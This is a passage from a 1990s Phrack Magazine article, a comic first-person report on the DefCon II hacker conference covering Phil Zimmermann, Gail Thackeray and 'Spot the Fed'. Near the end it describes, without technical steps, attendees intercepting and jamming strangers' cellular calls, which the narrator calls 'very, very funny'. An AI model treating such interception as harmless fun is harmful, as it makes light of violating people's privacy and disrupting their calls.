|||
|
relate to Seattle grunge-ware. I'm just too damned old to wear
|
|||
|
shirts that fit like kilts or sequin crusted S&M leather straps.
|
|||
|
Other than the visual cacophony of dress, every single
|
|||
|
hacker/phreak that I met exceeded my expectations in the area of
|
|||
|
deportment.
|
|||
|
|
|||
|
These are not wild kids on a rampage. The stories of drug-in
|
|||
|
duced frenzies and peeing in the hallways and tossing entire
|
|||
|
rooms of furniture out of the window that emanated from the
|
|||
|
HoHoCons seemed a million miles away. This was admittedly an
|
|||
|
opportunity to party, but not to excess. There was work to be
|
|||
|
done, lessons to be learned and new friends to make. So getting
|
|||
|
snot nosed drunk or ripped to the tits or Ecstatically high was
|
|||
|
just not part of the equation. Not here.
|
|||
|
|
|||
|
Now Vegas offers something quite distinct from other cities
|
|||
|
which host security or other conventions. At a Hyatt or a Hilton
|
|||
|
or any other fancy-ass over priced hotel, beers run $4 or $5 a
|
|||
|
crack plus you're expected to tip the black tied minimum wage
|
|||
|
worker for popping the top. The Sahara (for all of the other
|
|||
|
indignities we had to suffer) somewhat redeemed itself by offer
|
|||
|
ing an infinite supply of $1 Heinekens. Despite hundreds of beer
|
|||
|
bottle spread around the huge conference area (the hotel was
|
|||
|
definitely stingy in the garbage pail business) public drunken
|
|||
|
ness was totally absent. Party yes. Out of control? No way.
|
|||
|
Kudos!
|
|||
|
|
|||
|
Surprisingly, a fair number of women (girls) attended. A handful
|
|||
|
were there 'for the ride' but others . . . whoa! they know their
|
|||
|
shit.
|
|||
|
|
|||
|
I hope that's not sexist; merely an observation. I run across so
|
|||
|
few technically fluent ladies it's just a gut reaction. I wish
|
|||
|
there were more. In a former life, I owned a TV/Record produc
|
|||
|
tion company called Nashville North. We specialized in country
|
|||
|
rock taking advantage of the Urban Cowboy fad in the late 1970's.
|
|||
|
Our crew of producers and engineers consisted of the "Nashville
|
|||
|
Angels." And boy what a ruckus they would cause when we recorded
|
|||
|
Charlie Daniels or Hank Williams: they were stunning. Susan
|
|||
|
produced and was a double for Jacqueline Smith; we called Sally
|
|||
|
"Sabrina" because of her boyish appearance and resemblance to
|
|||
|
Kate Jackson. A super engineer. And there was Rubia Bomba, the
|
|||
|
Blond Bombshell, Sherra, who I eventually married: she knew
|
|||
|
country music inside and out - after all she came from Nashville
|
|||
|
in the first place.
|
|||
|
|
|||
|
When we would be scheduled to record an act for live radio, some
|
|||
|
huge famous country act like Asleep at The Wheel of Merle Haggard
|
|||
|
or Johnny Paycheck or Vassar Clements, she would wince in disbe
|
|||
|
lief when we cried, "who's that?" Needless to say, she knew the
|
|||
|
songs, the cues and the words. They all sounded alike. Country
|
|||
|
Music? Ecch. (So I learned.)
|
|||
|
|
|||
|
At any rate, ladies, we're equal opportunity offenders. C'mon
|
|||
|
down and let's get technical.
|
|||
|
|
|||
|
As the throngs pressed to register, I saw an old friend, Erik
|
|||
|
Bloodaxe. I've known him for several years now and he's even
|
|||
|
come over to baby sit the kids when he's in town. (Good prac
|
|||
|
tice.) Erik is about as famous as they come in the world of
|
|||
|
hackers. Above ground the authorities investigated him for his
|
|||
|
alleged participation in cyber crimes: after all, he was one of
|
|||
|
the founders of the Legion of Doom, and so, by default, he must
|
|||
|
have done something wrong. Never prosecuted, Erik Bloodaxe lives
|
|||
|
in infamy amongst his peers. To belay any naysayers, Erik ap
|
|||
|
peared on every single T-shirt there.
|
|||
|
|
|||
|
"I Only Hack For Money,"
|
|||
|
Erik Bloodaxe
|
|||
|
|
|||
|
proclaimed dozens of shirts wandering through the surveillance
|
|||
|
laden casinos. His is a name that will live in infamy.
|
|||
|
|
|||
|
So I yelled out, "Hey Chris!" He gave his net-name to the
|
|||
|
desk/table registrar. "Erik Bloodaxe."
|
|||
|
|
|||
|
"Erik Bloodaxe?" piped up an excited high pitched male voice.
|
|||
|
"Where?" People pointed at Chris who was about to be embarrass
|
|||
|
ingly amused by sweet little tubby Novocain who practically bowed
|
|||
|
at Chris's feet in reverence. "You're Erik Bloodaxe?" Novocain
|
|||
|
said with nervous awe - eyes gleaming up at Chris's ruddy skin
|
|||
|
and blond pony-tail.
|
|||
|
|
|||
|
"Yeah," Chris said in the most off handed way possible. For
|
|||
|
people who don't know him this might be interpreted as arrogance
|
|||
|
(and yes there is that) but he also has trouble publicly accept
|
|||
|
ing the fame and respect that his endearing next-generation
|
|||
|
teenage fans pour on him.
|
|||
|
|
|||
|
"Wow!" Novocain said with elegance and panache. "You're Erik
|
|||
|
Bloodaxe." We'd just been through that said Chris's eyes.
|
|||
|
|
|||
|
"Yeah."
|
|||
|
|
|||
|
"Wow, well, um, I . . . ah . . . you're . . . I mean, wow,
|
|||
|
you're the best." What does Sylvia Jane Miller from Rumpsteer,
|
|||
|
Iowa say to a movie star? This about covered it. The Midwest
|
|||
|
meets Madonna. "Wow!" Only here it's Novocain meets Cyber
|
|||
|
Christ himself.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Like any other security show or conference or convention there is
|
|||
|
a kickoff, generally with a speech. And DefCon II was no excep
|
|||
|
tion. Except.
|
|||
|
|
|||
|
Most conventional conventions (ConCons) start at 7:30 or 8:00 AM
|
|||
|
because, well, I don't know exactly why, except that's when so-
|
|||
|
called suits are expected to show up in their cubicles. Def
|
|||
|
Con, on the other hand, was scheduled to start at 10PM on Friday
|
|||
|
night when most hakcers show up for work. Most everyone had
|
|||
|
arrived and we were anxiously awaiting the opening ceremonies.
|
|||
|
But, here is where Jeff's lack of experience came in. The kick-
|
|||
|
off speaker was supposed to be Mark Ludwig of virus writing fame
|
|||
|
and controversy. But, he wasn't there!
|
|||
|
|
|||
|
He had jet lag.
|
|||
|
|
|||
|
"From Phoenix?" I exclaimed in mock horror to which nearby hack
|
|||
|
ers saw the absurdity of a 45 minute flight jet lag. Mark has a
|
|||
|
small frame and looks, well, downright weak, so I figured maybe
|
|||
|
flying and his constitution just didn't get along and he was
|
|||
|
massaging his swollen adenoids in his room.
|
|||
|
|
|||
|
"Oh, no! He's just come in from Australia . . ." Well that
|
|||
|
explains it, alright! Sorry for the aspersions, Mark.
|
|||
|
|
|||
|
But Jeff didn't have a back up plan. He was screwed. Almost four
|
|||
|
hundred people in the audience and nothing to tell them. So, and
|
|||
|
I can't quite believe it, one human being who had obviously never
|
|||
|
stood in front of a live audience before got up in an impromptu
|
|||
|
attempt at stand up comedy. The audience was ready for almost
|
|||
|
anything entertaining but this guy wasn't. Admittedly it was a
|
|||
|
tough spot, but . . .
|
|||
|
|
|||
|
"How do you turn a 486 into an 8088?"
|
|||
|
|
|||
|
"Add Windows." Groan. Groan.
|
|||
|
|
|||
|
"What's this?" Picture the middle three fingers of your right
|
|||
|
hand wiggling madly.
|
|||
|
|
|||
|
"An encrypted this!" Now hold out just the middle finger.
|
|||
|
Groan. Groan.
|
|||
|
|
|||
|
"What's this?" Spread your legs slightly apart, extend both
|
|||
|
hands to the front and move them around quickly in small circles.
|
|||
|
|
|||
|
"Group Air Mouse." Groan.
|
|||
|
|
|||
|
The evening groaned on with no Mark nor any able sharp witted
|
|||
|
comedian in sight.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Phil Zimmerman wrote PGP and is a God, if not Cyber-Christ him
|
|||
|
self to much of the global electronic world. Preferring to call
|
|||
|
himself a folk hero (even the Wall Street Journal used that term)
|
|||
|
Phil's diminutive height combined with a few too many pounds and
|
|||
|
a sweet as sweet can be smile earn him the title of Pillsbury
|
|||
|
Dough Boy look alike. Phil is simply too nice a guy to be em
|
|||
|
broiled in a Federal investigation to determine if he broke the
|
|||
|
law by having PGP put on a net site. You see, the Feds still
|
|||
|
think they can control Cyberspace, and thereby maintain antique
|
|||
|
export laws: "Thou shalt not export crypto without our approval"
|
|||
|
sayeth the NSA using the Department of Commerce as a whipping boy
|
|||
|
mouth piece. So now Phil faces 41-51 months of mandatory jail
|
|||
|
time if prosecuted and convicted of these absurd laws.
|
|||
|
|
|||
|
Flying in from Colorado, his appearance was anxiously awaited.
|
|||
|
"He's really coming?" " I wonder what he's like?" (Like every
|
|||
|
one else, fool, just different.) When he did arrive, his shit-
|
|||
|
eating grin which really isn't a shit-eating grin, it's just
|
|||
|
Phil's own patented grin, preceeded him down the hallway.
|
|||
|
|
|||
|
"Here he is!" "It's Phil Zimmerman." Get down and bow. "Hey,
|
|||
|
Phil the PGP dude is here."
|
|||
|
|
|||
|
He was instantly surrounded by those who recognize him and by
|
|||
|
those who don't but want to feel like part of the in-crowd.
|
|||
|
Chat chat, shit-eating grin, good war stories and G-rated pleas
|
|||
|
antries. Phil was doing what he does best: building up the folk
|
|||
|
hero image of himself. His engaging personality (even though he
|
|||
|
can't snorkel to save his ass) mesmerized the young-uns of the
|
|||
|
group. "You're Phil?"
|
|||
|
|
|||
|
"Yeah." No arrogance, just a warm country shit-eating grin
|
|||
|
that's not really shit-eating. Just Phil being Phil. He plays
|
|||
|
the part perfectly.
|
|||
|
|
|||
|
Despite the attention, the fame, the glory (money? nah . . .) the
|
|||
|
notoriety and the displeased eyes of onlooking Computer Cops who
|
|||
|
really do believe he belongs in jail for 4 years, Phil had a
|
|||
|
problem tonight. A real problem.
|
|||
|
|
|||
|
"I don't have a room!" he quietly told Jeff at the desk. "They
|
|||
|
say I'm not registered." No panic. Just a shit-eating grin
|
|||
|
that's not a shit-eating grin and hand the problem over to the
|
|||
|
experts: in this case Jeff Moss. Back to his endearing fans.
|
|||
|
Phil is so damned kind I actually saw him giving Cryptography 101
|
|||
|
lessons on the corner of a T-shirt encrusted table. "This is
|
|||
|
plaintext and this is crypto. A key is like a key to your hotel
|
|||
|
room . . . " If only Phil had a hotel room.
|
|||
|
|
|||
|
Someone had screwed up. Damn computers. So the search was on.
|
|||
|
What had happened to Phil's room? Jeff is scrambling and trying
|
|||
|
to get the hotel to rectify the situation. Everyone was abuzz.
|
|||
|
Phil, the crypto-God himself was left out in the cold. What
|
|||
|
would he do?
|
|||
|
|
|||
|
When suddenly, out of the din in the halls, we heard one voice
|
|||
|
above all the rest:
|
|||
|
|
|||
|
"Phil can sleep with me!"
|
|||
|
|
|||
|
Silence. Dead stone cold silence. Haunting silence like right
|
|||
|
after an earthquake and even the grubs and millipedes are so
|
|||
|
shaken they have nothing to say. Silence.
|
|||
|
|
|||
|
The poor kid who had somehow instructed his brain to utter the
|
|||
|
words and permitted them to rise through his esophagus and out
|
|||
|
over his lips stood the object of awe, incredulity and mental
|
|||
|
question marks. He must have thought to himself, "what's every
|
|||
|
one staring at? What's going on? Let me in on it." For the
|
|||
|
longest 10 seconds in the history of civilization he had abso
|
|||
|
lutely no clue that he was the target of attention. A handful of
|
|||
|
people even took two or three steps back, just in case. Just in
|
|||
|
case of what was never openly discussed, but nonetheless, just in
|
|||
|
case.
|
|||
|
|
|||
|
And then the brain kicked in and a weak sheepish smile of guilt
|
|||
|
overcame this cute acne-free baby-butt smooth-faced hacker who
|
|||
|
had certainly never had a shave, and was barely old enough to
|
|||
|
steer his own pram.
|
|||
|
|
|||
|
"Ohhhhhh . . . . noooooo," he said barely louder than a whisper.
|
|||
|
"That' not what I mean!"
|
|||
|
|
|||
|
I nearly peed laughing so hard in unison with a score of hackers
|
|||
|
who agreed that these misspoken words put this guy in the unenvi
|
|||
|
able position of being the recipient of a weekend of eternal
|
|||
|
politically incorrect ridicule.
|
|||
|
|
|||
|
"Yeah, right. We know what you mean . . "
|
|||
|
|
|||
|
"No really . . ." he pleaded as the verbal assaults on his al
|
|||
|
leged sexual preferences were slung one after the other.
|
|||
|
|
|||
|
This poor kid never read Shakespeare: "He who doth protest too
|
|||
|
much . . ."
|
|||
|
|
|||
|
If we couldn't have a great kickoff speech, or comedian, this
|
|||
|
would have to do.
|
|||
|
|
|||
|
The majority of the evening was spent making acquaintances:
|
|||
|
|
|||
|
"Hi, I'm Jim. Oops, I mean 'Septic Tank," was greeted with "Oh,
|
|||
|
you're Septic. I'm Sour Milk." (Vive la difference!) People who
|
|||
|
know each other electronically are as surprised to meet their
|
|||
|
counterparts as are first daters who are in love with the voice
|
|||
|
at the other end of the phone. "Giving good phone" implies one
|
|||
|
thing while "Having a great keystroke" just might mean another.
|
|||
|
|
|||
|
The din of the crowd was generally penetrated by the sounds of a
|
|||
|
quasi-pornographic Japanese high tech toon of questionable so
|
|||
|
cially redeeming value which a majority of the crowd appeared to
|
|||
|
both enjoy and understand. I am guilty of neither by reason of
|
|||
|
antiquity.
|
|||
|
|
|||
|
And so it goes.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
Phil Zimmerman must have gotten a room and some sleep because at
|
|||
|
10AM (or closely thereafter) he gave a rousing (some might say
|
|||
|
incendiary) speech strongly attacking the government's nearly
|
|||
|
indefensible position on export control
|
|||
|
|
|||
|
I was really impressed. Knowing Phil for some time, this was the
|
|||
|
first time I ever heard him speak and he did quite an admirable
|
|||
|
job. He ad libs, talks about what he want to talk about and does
|
|||
|
so in a compelling and emotional way. His ass is on the line and
|
|||
|
he should be emotional about it. The audience, indeed much of
|
|||
|
counter culture Cyberspace loves Phil and just about anything he
|
|||
|
has to say. His affable 40-something attorney from Colorado,
|
|||
|
Phil DuBois was there to both enjoy the festivities and, I'm
|
|||
|
sure, to keep tabs on Phil's vocalizations. Phil is almost too
|
|||
|
honest and open for his own good. Rounds and rounds of sincere
|
|||
|
appreciation.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Hey kids, now it's time for another round of Spot The Fed.
|
|||
|
Here's your chance to win one of these wonderful "I Spotted A
|
|||
|
Fed" T-shirts. And all you have to do is ID a fed and it's yours.
|
|||
|
Look around you? Is he a Fed? Is she under cover or under the
|
|||
|
covers? Heh, heh. Spot the Fed and win a prize. This one-size-
|
|||
|
fits-all XXX Large T-shirt is yours if you Spot the Fed. I had
|
|||
|
to keep silent. That would have been cheating. I hang out on
|
|||
|
both sides and have a reputation to maintain.
|
|||
|
|
|||
|
"Hey, I see one" screeched a female voice (or parhaps it was
|
|||
|
Phil's young admirer) from the left side of the 400+ seat ball
|
|||
|
room. Chaos! Where? Where? Where's the fed? Like when Jose
|
|||
|
Consenko hits one towards the center field fence and 70,000
|
|||
|
screaming fans stand on their seats to get a better view of a
|
|||
|
three inch ball 1/4 mile away flying at 150 miles per hour, this
|
|||
|
crowd stood like Lemmings in view of Valhalla the Cliff to espy
|
|||
|
the Fed. Where's the Fed?
|
|||
|
|
|||
|
Jeff jumped off the stage in anxious anticipation that yet anoth
|
|||
|
er anti-freedom-repressive law enforcement person had blown his
|
|||
|
cover. Where's the Fed? Jeff is searching for the accuser and
|
|||
|
the accused. Where's the Fed? Craned necks as far as the eye
|
|||
|
can see; no better than rubber neckers on Highway 95 looking for
|
|||
|
steams of blood and misplaced body parts they half expected a Fed
|
|||
|
to be as distinctly obvious as Quasimoto skulking under the
|
|||
|
Gorgoyled parapits of Notre Dame. No such luck. They look like
|
|||
|
you and me. (Not me.) Where's the Fed?
|
|||
|
|
|||
|
He's getting closer, closer to the Fed. Is it a Fed? Are you a
|
|||
|
Fed? C'mon, fess up. You're a a fed. Nailed. Busted. Psyche!
|
|||
|
|
|||
|
Here's your T-shirt. More fun than Monty Hall bringing out
|
|||
|
aliens from behind Door #3 on the X-Files. Good clean fun. But
|
|||
|
they didn't get 'em all. A couple of them were real good. Must
|
|||
|
have been dressed like an Hawaiian surf bum or banshee from
|
|||
|
Hellfire, Oregon. Kudos to those Feds I know never got spotted.
|
|||
|
Next year, guys. There's always next year.
|
|||
|
|
|||
|
Phil's notoriety and the presence of the Phoenix, Arizona prosecu
|
|||
|
tor who was largely responsible for the dubiously effective or
|
|||
|
righteous Operation Sun Devil, Gail Thackeray ("I change job
|
|||
|
every 4 years or so - right after an election") brought out the
|
|||
|
media. The LA TV station thought they might have the makings of
|
|||
|
a story and sent a film crew for the event.
|
|||
|
|
|||
|
"They're Feds. The ones with the cameras are Feds. I know it. Go
|
|||
|
ask 'em." No need. Not.
|
|||
|
|
|||
|
"Put away that camera." At hacking events it's proper etiquette
|
|||
|
to ask if people are camera shy before shooting. The guy that I
|
|||
|
was sitting next to buried his face in his hands to avoid being
|
|||
|
captured on video tape.
|
|||
|
|
|||
|
"What are you; a Fed or a felon?" I had to ask.
|
|||
|
|
|||
|
"What's the difference," his said. "They're the same thing." So
|
|||
|
which was it, I wondered. For the truly paranoid by the truly
|
|||
|
paranoid.
|
|||
|
|
|||
|
"Get that thing outta here," he motioned to the film crew who
|
|||
|
willingly obliged by turning off the lights. "They're really
|
|||
|
Feds," he whispered to me loud enough for the row in front and
|
|||
|
behind us to hear.
|
|||
|
|
|||
|
I moved on. Can't take chances with personal safety when I have
|
|||
|
kids to feed. Fed or felon, he scared me.
|
|||
|
|
|||
|
Gail Thackeray was the next act on stage. She was less in agree
|
|||
|
ment about Phil Zimmerman than probably anyone (except the unde
|
|||
|
tected Feds) in the audience. She, as expected, endorsed much of
|
|||
|
the law enforcement programs that revolve around various key
|
|||
|
management (escrow) schemes. Phil recalls a letter from Burma
|
|||
|
that describe how the freedom fighters use PGP to defend them
|
|||
|
selves against repression. He cites the letter from Latvia that
|
|||
|
says electronic freedom as offered by PGP is one of the only
|
|||
|
hopes for the future of a free Russia. Gail empathizes but sees
|
|||
|
trouble closer to home. Terrorism a la World Trade Center, or
|
|||
|
rocket launchers at O'Hare Airport, or little girl snuff films in
|
|||
|
Richmond, Virginia, or the attempt to poison the water supply
|
|||
|
outside of Boston. These are the real threats to America in the
|
|||
|
post Cold War era.
|
|||
|
|
|||
|
"What about our personal privacy!" cries a voice. "We don't want
|
|||
|
the government listening in. It's Big Brother 10 years behind
|
|||
|
schedule."
|
|||
|
|
|||
|
Gail is amused. She knew it would be a tough audience and has
|
|||
|
been through it before. She is not shaken in the least.
|
|||
|
|
|||
|
"I've read your mail," she responds. "Its not all that interest
|
|||
|
ing." The audience appreciates a good repartee. "You gotta pay
|
|||
|
me to do this, and frankly most of it is pretty boring." She
|
|||
|
successful made her point and kept the audience laughing all the
|
|||
|
way.
|
|||
|
|
|||
|
She then proceeded to tell that as she sees it, "The expectation
|
|||
|
of privacy isn't real." I really don't like hearing this for I
|
|||
|
believe in the need for an Electronic Bill of Rights. I simply
|
|||
|
think she's wrong. "History is clear," she said "the ability to
|
|||
|
listen in used to be limited to the very few. The telegraph was
|
|||
|
essentially a party line and still today in some rural areas
|
|||
|
communications aren't private. Why should we change it now?"
|
|||
|
|
|||
|
"Gail, you're so full of shit!" A loud voice bellowed from next
|
|||
|
to me again. Boy can I pick seats. "You know perfectly well that
|
|||
|
cops abuse the laws and this will just make their jobs easier.
|
|||
|
Once people find a way to escape tyranny you all want to bring it
|
|||
|
right back again. This is revolution and you're scared of los
|
|||
|
ing. This kind of puke scum you're vomiting disgusts me. I just
|
|||
|
can't take it any more. " Yeah, right on. Scattered applause.
|
|||
|
While this 'gent' may have stated what was on many minds, his
|
|||
|
manner was most unbefitting a conference and indeed, even DefCon
|
|||
|
II. This was too rude even for a hacker get-together. The man
|
|||
|
with the overbearing comments sat down apologizing. "She just
|
|||
|
gets me going, she really does. Really pisses me off when she
|
|||
|
goes on like about how clean the Feds are. She knows better than
|
|||
|
to run diarrhea of the mouth like that."
|
|||
|
|
|||
|
"You know," she continued. "Right across the street is a Spy
|
|||
|
Shop. One of those retail stores where you can buy bugs and taps
|
|||
|
and eavesdropping equipment?" The audience silently nodded. "We
|
|||
|
as law enforcement are prohibited by law from shopping there and
|
|||
|
buying those same things anyone else can. We're losing on that
|
|||
|
front." Cheers. Screw the Feds.
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 20 of 28
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
(Cyber Christ Meets Lady Luck Continued)
|
|||
|
|
|||
|
|
|||
|
I don't agree with everything that Gail says, but she is a com
|
|||
|
pelling speaker; she believes in what she says. But I do agree
|
|||
|
with her on the difficulty of forensic evidence in computer
|
|||
|
cases.
|
|||
|
|
|||
|
"I got really mad," she said. "I was reading a magazine and
|
|||
|
there was an ad for United, you know, the employee owned airline.
|
|||
|
And it was a beautiful ad, hundred of employees standing in front
|
|||
|
of a brand new great big jet. All smiling and happy." Gail then
|
|||
|
frowned deeply. "Some stockholder ought to sue them for mislead
|
|||
|
ing advertising." This was more like it! Go, Gail! "I started
|
|||
|
to look at the picture carefully and I noticed this unmistakably
|
|||
|
fat lady in a pink dress. And then over a few persons. . .guess
|
|||
|
what? The same fat lady in pink." Roars of laughter and ap
|
|||
|
plause.
|
|||
|
|
|||
|
Her point? What seems real may not be real at all, and with a few
|
|||
|
hundred dollars in software and a little practice, most anyone
|
|||
|
can build a false reality digitally.
|
|||
|
|
|||
|
Her time was up but the audience wanted more. She was mobbed for
|
|||
|
eternity by hackers who fight her tooth and nail but respect her
|
|||
|
comportment enough to make the disagreements lively, partisan,
|
|||
|
entertaining, but with respect. Respectful hackers. No HoHoCon
|
|||
|
orgies; merely verbal barbs with no solution. Everyone knew that,
|
|||
|
but it's the battle that counts.
|
|||
|
|
|||
|
More security conference should be this open, this honest and
|
|||
|
informative, with all kinds of people with all kinds of opinions.
|
|||
|
That is how we, and I, learn. Listen and learn. And all for
|
|||
|
$5000 no less, plus a paltry $15 entrance fee.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
The afternoon sessions were filled with a mixture of anti-govern
|
|||
|
ment, pro-privacy advocacy, virus workshops and such by both
|
|||
|
under and above ground folks. Padgett Peterson's knowledge of
|
|||
|
viruses is deep and he spread the same wisdom as his does in so
|
|||
|
called legitimate circles. Knowledge is knowledge, and better
|
|||
|
accurate than wrong.
|
|||
|
|
|||
|
It's often surprising to see how people will voice the same
|
|||
|
opinion in varying degree of intensity depending upon their
|
|||
|
audience. Mark Aldrich of General Research Corp. in the Washing
|
|||
|
ton area made a statement that I doubt I would hear at a ConCon.
|
|||
|
"Fear your government that fears your crypto. Use crypto as
|
|||
|
a weapon." Sara Gordon's panel discussion on crypto and privacy
|
|||
|
and related topics fueled the audience's general anti-fed atti
|
|||
|
tude.
|
|||
|
|
|||
|
"I was bugged by the Feds." "So was I?" "What can we do about
|
|||
|
it." "Yeah, they listen in on my phones, too. I can hear the
|
|||
|
clicks." Right.
|
|||
|
|
|||
|
As Mark so succinctly put it, "if the government wants to bug
|
|||
|
you, you'll never know. They're that good.". That kind of shut
|
|||
|
up the dilettante paranoids in the group, albeit mumbling that
|
|||
|
they just knew that they were the victim of one of the 900 or so
|
|||
|
court approved wire taps last year. Right. I think Gail was
|
|||
|
right: some of you guys are too boring to be believed.
|
|||
|
|
|||
|
The afternoon edition of the Spot A Fed contest took us on the
|
|||
|
run. I actually succombed to their enthusiasm and a general lack
|
|||
|
of better judgement and followed a group of 8 or 10 to unmask an
|
|||
|
unmarked white van in the parking lot.
|
|||
|
|
|||
|
"It's the Feds." "How do you know?" "Oh, it's the Feds alright."
|
|||
|
"How do you know." "It's a white van and the intelligence serv
|
|||
|
ices use white vans." "What are you going to do?" "Bust 'em."
|
|||
|
"Bust 'em for what?" "For being Feds."
|
|||
|
|
|||
|
This motley crew traipsed through the mile long casino, trodding
|
|||
|
upon the ugly tartan/paisley carpets so obnoxiously loud a blind
|
|||
|
man could cry "Uncle!", into the Hall of Overpriced Shoppes
|
|||
|
through the lobby and over to the parking garage. We had to have
|
|||
|
$100,000 of surveillance gear in tow:(enough to detect the planet
|
|||
|
Pluto fart in b-flat). Radio receivers and eavesdropping equip
|
|||
|
ment were courtesy of my pal Mike Peros. The goal was, if this
|
|||
|
was a Fed van, we could hear it. I don't think so, but I go for
|
|||
|
the ride and a few minutes of reprieve away from the conference
|
|||
|
hall.
|
|||
|
|
|||
|
As we near, the excitement grows among the more paranoid who are
|
|||
|
trying to instill their own mental foibles into their companions
|
|||
|
and sheer terror in normal old Vegas visitors who have no idea
|
|||
|
what they've walked into.
|
|||
|
|
|||
|
Feds? Not. Surrepticious radio transmissions? Just hotel securi
|
|||
|
ty tracking the movements of 8 or 10 paranoids (and one writer
|
|||
|
with nothing else to do for a half hour) into a parking garage
|
|||
|
which has more cameras than NBC. Feds? Of course not. Don't be
|
|||
|
ridiculous.
|
|||
|
|
|||
|
* * * * *
|
|||
|
|
|||
|
To say nothing worthwhile occurred until 11PM that evening would
|
|||
|
be lying, but this thing, this DefCon II thing, was turning into
|
|||
|
what I would have called 25 years ago, a Love-In. The partici
|
|||
|
pants were giddy from the event, the camaraderie, the $1 Heinek
|
|||
|
ens and the hacking. The Sahara was actually pretty good about
|
|||
|
it. Jeff got the conference space for free because he guaranteed
|
|||
|
that at least 100 hotel rooms would be booked by "computer en
|
|||
|
thusiasts coming to a small computer conference." Little did the
|
|||
|
hotel know that half the crowd was too young to drink, too broke
|
|||
|
to gamble, and conspicuous enough to ward off legitimate clients.
|
|||
|
But a deal's a deal.
|
|||
|
|
|||
|
The hotel operators went out of their way and allegedly gave the
|
|||
|
hackers permission to hack through the PBX in order to provide a
|
|||
|
SLPP connection.
|
|||
|
|
|||
|
"Just put it back the way you found it when you're done," was the
|
|||
|
hotel's only and quite reasonable request.
|
|||
|
|
|||
|
In my day an equivalent event producing an equivalent social non-
|
|||
|
drug induced high would have been achieved by tossing a Frisbee
|
|||
|
to Grace Slick (Lead singer Jefferson Airplane) and have her
|
|||
|
throw it back. We didn't have the kind of technology that today's
|
|||
|
rebellious age has. We had the Beatles and Jimi Hendrix, safe
|
|||
|
sex (kinda), safe drugs (well, maybe a little safer) and a cause.
|
|||
|
But no technology to speak of.
|
|||
|
|
|||
|
When I was on the publishing staff of the New York City Free
|
|||
|
Press in 1968/9 we wrote our anti-establishment diatribes by
|
|||
|
hand. By hand! And then we went down to a dark office late at
|
|||
|
night to use their typesetting gear when it was idle. It took no
|
|||
|
more than a blushing glance around the room to realize that we
|
|||
|
impressionable teens were publishing our political extremisms on
|
|||
|
equipment courtesy of Al Goldstein and Screw magazine. Now that
|
|||
|
was an education.
|
|||
|
|
|||
|
DefCon II was a Love-In, technology and all.
|
|||
|
|
|||
|
Come 11PM yet another speaker canceled so I offered to chat to
|
|||
|
the crowd for a half hour or so on Van Eck radiation; the emis
|
|||
|
sions from CRT's that make video screens readable from a dis
|
|||
|
tance. Now this wasn't a fill in at 2PM or anything. Sessions
|
|||
|
reconvened at 11PM and I spoke to a full audience who were there
|
|||
|
to get a midnight lesson in cellular hacking.
|
|||
|
|
|||
|
Most above ground types still believe that hacking is an acne-
|
|||
|
faced teenager, chigging Jolt Cola, wolfing down pepperoni
|
|||
|
pizza and causing Corporate America no end of grief. To a cer
|
|||
|
tain extent some of this is true. But hacking is so much more.
|
|||
|
|
|||
|
As Rop Gongrijjp, editor of Hacktic once told me, "hacking is
|
|||
|
disrespect of technology." It's going the extra mile to find out
|
|||
|
how things work. Many of the older hackers, those in their early
|
|||
|
20's and older, are migrating from the conventional dial-em-up
|
|||
|
and break-in hacking image to the fine art of cellular hacking.
|
|||
|
How do these things work? What are the frequencies? How can I
|
|||
|
customize my phone? How many channels can I scan? The possibil
|
|||
|
ities are endless as I soon learned.
|
|||
|
|
|||
|
Jim and Bill (fake names) asked if I wanted to see a great demo.
|
|||
|
Sure! No names, they said. OK. No problem. In one of the
|
|||
|
several thousand hotel rooms at the Sahara was a pile of equip
|
|||
|
ment to make an under budgeted FBI surveillance team insanely
|
|||
|
jealous. There in the middle of the ridiculously filthy room that
|
|||
|
no doubt caused the maid to shudder, sat a log periodic antenna
|
|||
|
poised atop a strong and highly adjustable photographic-style
|
|||
|
tripod. Feeding the antenna was a hunk of coax attached to a
|
|||
|
cell phone's antenna jack.
|
|||
|
|
|||
|
OK, so what's that? Free cell calls? No, much more.
|
|||
|
|
|||
|
A second cell phone/scanner, an Oki 900 was modified and connect
|
|||
|
ed to a laptop computer. (This was the exact modification being
|
|||
|
discussed downstairs) Custom software that was freely distrib
|
|||
|
uted around DefCon scanned the data from the Oki and displayed
|
|||
|
the scanning activity. A pair of speakers then audibly broadcast
|
|||
|
the specific conversation. And in Vegas, you can imagine what
|
|||
|
was going over the open airwaves!
|
|||
|
|
|||
|
A half dozen 'kids' sat around enthralled, each begging for his
|
|||
|
turn to, as Jim put it, "harass cellular users. Pure and simple.
|
|||
|
Harassment. Stomp on the son of a bitch," he laughed, joined in
|
|||
|
by the others.
|
|||
|
|
|||
|
When a 'good' conversation was detected, they entered the channel
|
|||
|
into the broadcasting cell phone and spoke. And talk they did.
|
|||
|
Essentially they turned 'private' conversations into wide-band
|
|||
|
free-for-alls. If they spoke for only a few seconds one or both
|
|||
|
of the parties could hear what was being said. If they talked
|
|||
|
for too long, the overpowering signal from the antenna would
|
|||
|
literally wipe out the chat: the cell switch reacted with an
|
|||
|
internal belch and shut down. Stomping, they called it.
|
|||
|
|
|||
|
For those on the receiving end of the harassment, it must have
|
|||
|
sounded like the overbearing voice of God telling Noah how to
|
|||
|
build the Ark.
|
|||
|
|
|||
|
"Noah?"
|
|||
|
|
|||
|
"Who dat?
|
|||
|
|
|||
|
"Noah?"
|
|||
|
|
|||
|
"Who is that?"
|
|||
|
|
|||
|
What terror lurks in the minds of boys . . .
|
|||
|
|
|||
|
For those old enough to remember, stomping is no more a stunt
|
|||
|
than putting a 500 watt linear power amplifier on a CB radio and
|
|||
|
blasting nearby CB's to kingdom come. The truckers used to do it
|
|||
|
to 4-wheelers. When the police began monitoring CB channels "to
|
|||
|
protect and serve" they became the target of CB stomping. So
|
|||
|
what else is new?
|
|||
|
|
|||
|
I gotta give it to them: these characters designed and built the
|
|||
|
software, modified the phones and put it all together and it
|
|||
|
works! Not bad on a $3 allowance and a 10th grade education.
|
|||
|
Now, I guess what they did may have been sort of illegal, or at
|
|||
|
least highly unethical and definitely not nice. But I have to
|
|||
|
admit, some of what I witnessed was very, very, funny. I'm not
|
|||
|
